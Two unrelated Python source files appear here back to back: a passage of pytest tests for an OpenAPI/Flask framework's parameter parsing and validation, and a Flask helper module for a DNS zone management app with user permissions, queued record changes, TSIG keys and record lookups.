array_response: List[str] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == ["one", "two", "three"]
url = "/v1.0/test_array_pipes_query_param?items=1|2|3"
response = app_client.get(url, headers=headers)
array_response: List[int] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == [1, 2, 3]
url = "/v1.0/test_array_unsupported_query_param?items=1;2;3"
response = app_client.get(url, headers=headers)
array_response: List[str] = json.loads(
response.data.decode("utf-8", "replace"),
) # unsupported collectionFormat
assert array_response == ["1;2;3"]
url = "/v1.0/test_array_csv_query_param?items=A&items=B&items=C&items=D,E,F"
response = app_client.get(url, headers=headers)
array_response: List[str] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with csv format
assert array_response == ["D", "E", "F"]
url = "/v1.0/test_array_multi_query_param?items=A&items=B&items=C&items=D,E,F"
response = app_client.get(url, headers=headers)
array_response: List[str] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with csv format
assert array_response == ["A", "B", "C", "D", "E", "F"]
url = "/v1.0/test_array_pipes_query_param?items=4&items=5&items=6&items=7|8|9"
response = app_client.get(url, headers=headers)
array_response: List[int] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with pipes format
assert array_response == [7, 8, 9]
def test_array_form_param(simple_app):
app_client = simple_app.app.test_client()
headers = {"Content-type": "application/x-www-form-urlencoded"}
url = "/v1.0/test_array_csv_form_param"
response = app_client.post(url, headers=headers)
array_response: List[str] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == ["squash", "banana"]
url = "/v1.0/test_array_csv_form_param"
response = app_client.post(url, headers=headers, data={"items": "one,two,three"})
array_response: List[str] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == ["one", "two", "three"]
url = "/v1.0/test_array_pipes_form_param"
response = app_client.post(url, headers=headers, data={"items": "1|2|3"})
array_response: List[int] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == [1, 2, 3]
url = "/v1.0/test_array_csv_form_param"
data = "items=A&items=B&items=C&items=D,E,F"
response = app_client.post(url, headers=headers, data=data)
array_response: List[str] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with csv format
assert array_response == ["D", "E", "F"]
url = "/v1.0/test_array_pipes_form_param"
data = "items=4&items=5&items=6&items=7|8|9"
response = app_client.post(url, headers=headers, data=data)
array_response: List[int] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with pipes format
assert array_response == [7, 8, 9]
def test_extra_query_param(simple_app):
app_client = simple_app.app.test_client()
headers = {"Content-type": "application/json"}
url = "/v1.0/test_parameter_validation?extra_parameter=true"
resp = app_client.get(url, headers=headers)
assert resp.status_code == 200
def test_strict_extra_query_param(strict_app):
app_client = strict_app.app.test_client()
headers = {"Content-type": "application/json"}
url = "/v1.0/test_parameter_validation?extra_parameter=true"
resp = app_client.get(url, headers=headers)
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["detail"] == "Extra query parameter extra_parameter not in spec"
def test_strict_formdata_param(strict_app):
app_client = strict_app.app.test_client()
headers = {"Content-type": "application/x-www-form-urlencoded"}
url = "/v1.0/test_array_csv_form_param"
resp = app_client.post(url, headers=headers, data={"items": "mango"})
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == ["mango"]
assert resp.status_code == 200
@pytest.mark.parametrize(
"arg, result",
[
# The cases accepted by the Flask/Werkzeug converter
["123", "int 123"],
["0", "int 0"],
["0000", "int 0"],
# Additional cases that we want to support
["+123", "int 123"],
["+0", "int 0"],
["-0", "int 0"],
["-123", "int -123"],
],
)
def test_path_parameter_someint(simple_app, arg, result):
assert isinstance(arg, str) # sanity check
app_client = simple_app.app.test_client()
resp = app_client.get(f"/v1.0/test-int-path/{arg}") # type: flask.Response
assert resp.data.decode("utf-8", "replace") == f'"{result}"\n'
def test_path_parameter_someint__bad(simple_app):
# non-integer values will not match Flask route
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-int-path/foo") # type: flask.Response
assert resp.status_code == 404
@pytest.mark.parametrize(
"arg, result",
[
# The cases accepted by the Flask/Werkzeug converter
["123.45", "float 123.45"],
["123.0", "float 123"],
["0.999999999999999999", "float 1"],
# Additional cases that we want to support
["+123.45", "float 123.45"],
["-123.45", "float -123.45"],
["123.", "float 123"],
[".45", "float 0.45"],
["123", "float 123"],
["0", "float 0"],
["0000", "float 0"],
["-0.000000001", "float -1e-09"],
["100000000000", "float 1e+11"],
],
)
def test_path_parameter_somefloat(simple_app, arg, result):
assert isinstance(arg, str) # sanity check
app_client = simple_app.app.test_client()
resp = app_client.get(f"/v1.0/test-float-path/{arg}") # type: flask.Response
assert resp.data.decode("utf-8", "replace") == f'"{result}"\n'
def test_path_parameter_somefloat__bad(simple_app):
# non-float values will not match Flask route
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-float-path/123,45") # type: flask.Response
assert resp.status_code == 404
def test_default_param(strict_app):
app_client = strict_app.app.test_client()
resp = app_client.get("/v1.0/test-default-query-parameter")
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["app_name"] == "especifico"
def test_falsy_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-falsy-param", query_string={"falsy": 0})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == 0
resp = app_client.get("/v1.0/test-falsy-param")
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == 1
def test_formdata_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/test-formData-param", data={"formData": "test"})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == "test"
def test_formdata_bad_request(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/test-formData-param")
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["detail"] in [
"Missing formdata parameter 'formData'",
"'formData' is a required property", # OAS3
]
def test_formdata_missing_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/test-formData-missing-param", data={"missing_formData": "test"})
assert resp.status_code == 200
def test_formdata_extra_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post(
"/v1.0/test-formData-param", data={"formData": "test", "extra_formData": "test"},
)
assert resp.status_code == 200
def test_strict_formdata_extra_param(strict_app):
app_client = strict_app.app.test_client()
resp = app_client.post(
"/v1.0/test-formData-param", data={"formData": "test", "extra_formData": "test"},
)
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["detail"] == "Extra formData parameter extra_formData not in spec"
def test_formdata_file_upload(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post(
"/v1.0/test-formData-file-upload",
data={"formData": (BytesIO(b"file contents"), "filename.txt")},
)
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == {"filename.txt": "file contents"}
def test_formdata_file_upload_bad_request(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/test-formData-file-upload")
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["detail"] in [
"Missing formdata parameter 'formData'",
"'formData' is a required property", # OAS3
]
def test_formdata_file_upload_missing_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post(
"/v1.0/test-formData-file-upload-missing-param",
data={"missing_formData": (BytesIO(b"file contents"), "example.txt")},
)
assert resp.status_code == 200
def test_body_not_allowed_additional_properties(simple_app):
app_client = simple_app.app.test_client()
body = {"body1": "bodyString", "additional_property": "test1"}
resp = app_client.post(
"/v1.0/body-not-allowed-additional-properties",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert "Additional properties are not allowed" in response["detail"]
def test_bool_as_default_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-param")
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-bool-param", query_string={"thruthiness": True})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is True
def test_bool_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-param", query_string={"thruthiness": True})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is True
resp = app_client.get("/v1.0/test-bool-param", query_string={"thruthiness": False})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is False
def test_bool_array_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-array-param?thruthiness=true,true,true")
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is True
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-array-param?thruthiness=true,true,false")
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is False
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-array-param")
assert resp.status_code == 200
def test_required_param_miss_config(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-required-param")
assert resp.status_code == 400
resp = app_client.get("/v1.0/test-required-param", query_string={"simple": "test"})
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-required-param")
assert resp.status_code == 400
def test_parameters_defined_in_path_level(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/parameters-in-root-path?title=nice-get")
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == ["nice-get"]
resp = app_client.get("/v1.0/parameters-in-root-path")
assert resp.status_code == 400
def test_array_in_path(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-array-in-path/one_item")
assert json.loads(resp.data.decode("utf-8", "replace")) == ["one_item"]
resp = app_client.get("/v1.0/test-array-in-path/one_item,another_item")
assert json.loads(resp.data.decode("utf-8", "replace")) == [
"one_item",
"another_item",
]
def test_nullable_parameter(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/nullable-parameters?time_start=null")
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
resp = app_client.get("/v1.0/nullable-parameters?time_start=None")
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
time_start = 1010
resp = app_client.get(f"/v1.0/nullable-parameters?time_start={time_start}")
assert json.loads(resp.data.decode("utf-8", "replace")) == time_start
resp = app_client.post("/v1.0/nullable-parameters", data={"post_param": "None"})
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
resp = app_client.post("/v1.0/nullable-parameters", data={"post_param": "null"})
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
headers = {"Content-Type": "application/json"}
resp = app_client.put("/v1.0/nullable-parameters", data="null", headers=headers)
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
resp = app_client.put("/v1.0/nullable-parameters", data="None", headers=headers)
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
resp = app_client.put("/v1.0/nullable-parameters-noargs", data="None", headers=headers)
assert json.loads(resp.data.decode("utf-8", "replace")) == "hello"
def test_args_kwargs(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/query-params-as-kwargs")
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == {}
resp = app_client.get("/v1.0/query-params-as-kwargs?foo=a&bar=b")
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == {"foo": "a"}
if simple_app._spec_file == "openapi.yaml":
body = {"foo": "a", "bar": "b"}
resp = app_client.post(
"/v1.0/body-params-as-kwargs",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 200
# having only kwargs, the handler would have been passed 'body'
assert json.loads(resp.data.decode("utf-8", "replace")) == {
"body": {"foo": "a", "bar": "b"},
}
def test_param_sanitization(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/param-sanitization")
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == {}
resp = app_client.post(
"/v1.0/param-sanitization?$query=queryString", data={"$form": "formString"},
)
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == {
"query": "queryString",
"form": "formString",
}
body = {"body1": "bodyString", "body2": "otherString"}
resp = app_client.post(
"/v1.0/body-sanitization",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == body
body = {"body1": "bodyString", "body2": 12, "body3": {"a": "otherString"}}
resp = app_client.post(
"/v1.0/body-sanitization-additional-properties",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == body
body = {
"body1": "bodyString",
"additional_property": "test1",
"additional_property2": "test2",
}
resp = app_client.post(
"/v1.0/body-sanitization-additional-properties-defined",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == body
def test_no_sanitization_in_request_body(simple_app):
app_client = simple_app.app.test_client()
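    # Unlike parameter names, keys inside the request body are forwarded to the handler unmodified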
data = {
"name": "John",
"$surname": "Doe",
"1337": True,
"!#/bin/sh": False,
"(1/0)": "division by zero",
"s/$/EOL/": "regular expression",
"@8am": "time",
}
response = app_client.post("/v1.0/forward", json=data)
assert response.status_code == 200
assert response.json == data
def test_parameters_snake_case(snake_case_app):
app_client = snake_case_app.app.test_client()
headers = {"Content-type": "application/json"}
resp = app_client.post(
"/v1.0/test-post-path-snake/123",
headers=headers,
data=json.dumps({"a": "test"}),
)
assert resp.status_code == 200
resp = app_client.post(
"/v1.0/test-post-path-shadow/123",
headers=headers,
data=json.dumps({"a": "test"}),
)
assert resp.status_code == 200
resp = app_client.post(
"/v1.0/test-post-query-snake?someId=123",
headers=headers,
data=json.dumps({"a": "test"}),
)
assert resp.status_code == 200
resp = app_client.post(
"/v1.0/test-post-query-shadow?id=123&class=header",
headers=headers,
data=json.dumps({"a": "test"}),
)
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-get-path-snake/123")
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-get-path-shadow/123")
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-get-query-snake?someId=123")
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-get-query-shadow?list=123")
assert resp.status_code == 200
    # Tests for when a camelCase parameter is supplied whose snake_case version
    # matches an existing parameter and view function argument, or vice versa
resp = app_client.get("/v1.0/test-get-camel-case-version?truthiness=true&orderBy=asc")
assert resp.status_code == 200
assert resp.get_json() == {"truthiness": True, "order_by": "asc"}
resp = app_client.get("/v1.0/test-get-camel-case-version?truthiness=5")
assert resp.status_code == 400
assert (
resp.get_json()["detail"]
== "Wrong type, expected 'boolean' for query parameter 'truthiness'"
)
# Incorrectly cased params should be ignored
resp = app_client.get("/v1.0/test-get-camel-case-version?Truthiness=true&order_by=asc")
assert resp.status_code == 200
assert resp.get_json() == {"truthiness": False, "order_by": None} # default values
resp = app_client.get("/v1.0/test-get-camel-case-version?Truthiness=5&order_by=4")
assert resp.status_code == 200
assert resp.get_json() == {"truthiness": False, "order_by": None} # default values
# TODO: Add tests for body parameters
def test_get_unicode_request(simple_app):
"""Regression test for Python 2 UnicodeEncodeError bug during parameter parsing."""
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/get_unicode_request?price=%C2%A319.99") # £19.99
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8"))["price"] == "£19.99"
def test_cookie_param(simple_app):
app_client = simple_app.app.test_client()
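    # Uses the older Werkzeug test-client signature: set_cookie(server_name, key, value)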
app_client.set_cookie("localhost", "test_cookie", "hello")
response = app_client.get("/v1.0/test-cookie-param")
assert response.status_code == 200
assert response.json == {"cookie_value": "hello"}
|
#!/usr/bin/env python2
from flask import Response
from flask_login import UserMixin  # explicit import for the Usuario class below
import dns.message
import dns.query
import dns.rdata
import dns.rdatatype
import dns.rdtypes
import dns.tsigkeyring
import dns.update
from .models import *
import urllib
import IPy
import json
import re
class Usuario(UserMixin):
def __init__(self, username, password):
self.id = username
self.password = password
def is_active(self):
return True
@staticmethod
def get(userid):
# user_database = [("sbuczak","qwe123")]
user_database = users.select().where(users.username == userid)
for users_get in user_database:
if users_get.username == userid:
return Usuario(users_get.username, users_get.password)
return None
def get_zone_changes(zona):
""" Get the list of modifications in queue """
modlist = []
for item in zones.select().where(zones.zone == zona):
zona_id = item.id
for mod in change_cache.select().where(change_cache.zone_id == zona_id):
# safeurl_data = urllib.quote_plus(mod.data)
modlist.append({'id': mod.id,
'username': mod.username,
'rr': mod.rr,
'zone_id': mod.zone_id,
'type': mod.type,
'ttl': mod.ttl,
'data': mod.data,
'action': mod.action})
return modlist
def mod_change_cache(zona=None, rr=None, rtype=None, ttl=1800, data=None, action=None, username=None, del_id=None, operation=None):
"""Modify the publish queue"""
zone_id = zones.select().where(zones.zone == zona).get()
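    # The .get() call returns a zones model row, used directly as the zone_id value
    # below (peewee resolves a model instance to its primary key for foreign-key fields)
    # Data for A and NS records must parse as an IP address (via IPy) before it is queued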
if rtype == "A" or rtype == "NS":
try:
IPy.parseAddress(data)
except ValueError:
return False
if operation == "add_unpub":
for item in [zona, rr, rtype, ttl, data, action, operation]:
if item is None:
return False
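        # Skip the insert if an identical pending "add" entry already exists for this zone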
if change_cache.select().where(change_cache.rr == rr,
change_cache.zone_id == zone_id,
change_cache.type == rtype,
change_cache.data == data,
change_cache.action == "add").count():
return True
change_cache.create(username=username,
rr=rr,
zone_id=zone_id,
type=rtype,
ttl=ttl,
data=data,
action=action)
return True
elif operation == "del_unpub":
delete_query = change_cache.delete().where((change_cache.id == del_id) & (change_cache.zone_id == zone_id))
delete_query.execute()
return True
def get_view_server(view=None):
""" Gets the view's master server """
if view is not None:
view_server = views.select().where(views.name == view).get()
return view_server.server
def get_view_key(view=None):
""" Gets the view's tsig key """
if view is not None:
view_server = views.select().where(views.name == view).get()
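        # The stored tsig_key is "<keyname> <secret>"; split it into the {name: secret}
        # mapping presumably consumed elsewhere by dns.tsigkeyring.from_text()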
view_key_dict = {str(view_server.tsig_key).split(" ", 1)[0]: str(view_server.tsig_key).split(" ", 1)[1]}
return view_key_dict
def get_zone_view(zone=None):
""" Gets the zone's view """
if zone is not None:
zone_view = zones.select().where(zones.zone == zone).get()
return zone_view.view
def get_zone_id(zone=None):
""" Gets zone id """
if zone is not None:
zone_get = zones.select().where(zones.zone == zone).get()
return zone_get.id
def get_zone_name(zone_id=None):
""" Gets zone name from id """
    if zone_id is not None:
zone_get = zones.select().where(zones.id == zone_id).get()
return zone_get.zone
def get_zone_pools(zone=None):
""" Get zone Pools """
if zone is not None:
        zone_id = get_zone_id(zone=zone)  # NOTE: looked up but not used below
        pool_get = pools.select().where(pools.zone == zone)
        for item in pool_get:
            print(item)
return ""
def get_user_permissions(user=None):
""" Gets permissions for user """
if user is not None:
return_list = []
user_query = users.select().where(users.username == user).get()
for item in permissions.select().where(permissions.user_id == user_query.id):
return_list.append(item.zone_id)
return return_list
def get_user_list():
""" Get user list """
return_list = []
list_query = users.select()
for item in list_query:
return_list.append({'id': item.id,
'username': item.username})
return return_list
def get_user_role(user=None):
""" Gets role for user """
if user is not None:
role_query = roles.select(roles.role).where(roles.user == user).get()
return role_query.role
def get_zone_list(username=None):
""" Gets zone list """
if username is not None:
zone_list = []
authorized_zone_list = get_user_permissions(username)
for zone in zones.select().order_by(zones.zone):
if zone.id in authorized_zone_list:
change_qty = change_cache.select().where(change_cache.zone_id == zone.id).count()
zone_list.append({'id': zone.id,
'name': zone.zone,
'view': zone.view,
'change_qty': change_qty})
return zone_list
return []
#
def api_response(dictionary=None):
""" Return dictionary as a json Response object """
if dictionary is not None:
return Response(json.dumps(dictionary, indent=4, sort_keys=True), mimetype="application/json")
def search_record(record=None, user=None):
for zone_id in get_user_permissions(user=user):
zone_name = get_zone_name(zone_id=zone_id)
        # Match records that end in this zone name (one or more labels; dots in the zone are escaped)
        pattern = re.compile(r"^([\w-]+\.)+%s$" % re.escape(zone_name))
result = {}
if pattern.match(record):
zone_view = get_zone_view(zone=zone_name)
master = get_view_server(view=zone_view)
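            # Query the zone's master server over TCP for all record types at this name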
dns_query = dns.message.make_query(record, dns.rdatatype.ANY)
dns_response = dns.query.tcp(dns_query, str(master), timeout=10)
            if dns_response is not None:
                for answer in dns_response.answer:
                    # RRset string format: "<name> <ttl> <class> <type> <rdata>"
                    answer_items = str(answer).split(" ")
                    result[zone_name] = {'rr': answer_items[0],
                                         'data': answer_items[4],
                                         'type': answer_items[3],
                                         'ttl': answer_items[1]}
return result
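

# Hypothetical usage sketch (zone names, records and usernames are illustrative only,
# and assume the peewee models star-imported from .models are backed by a populated database):
#
#     pending = get_zone_changes("example.com")
#     mod_change_cache(zona="example.com", rr="www", rtype="A", ttl=300,
#                      data="192.0.2.10", action="add", username="admin",
#                      operation="add_unpub")
#     results = search_record(record="www.example.com", user="admin")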
|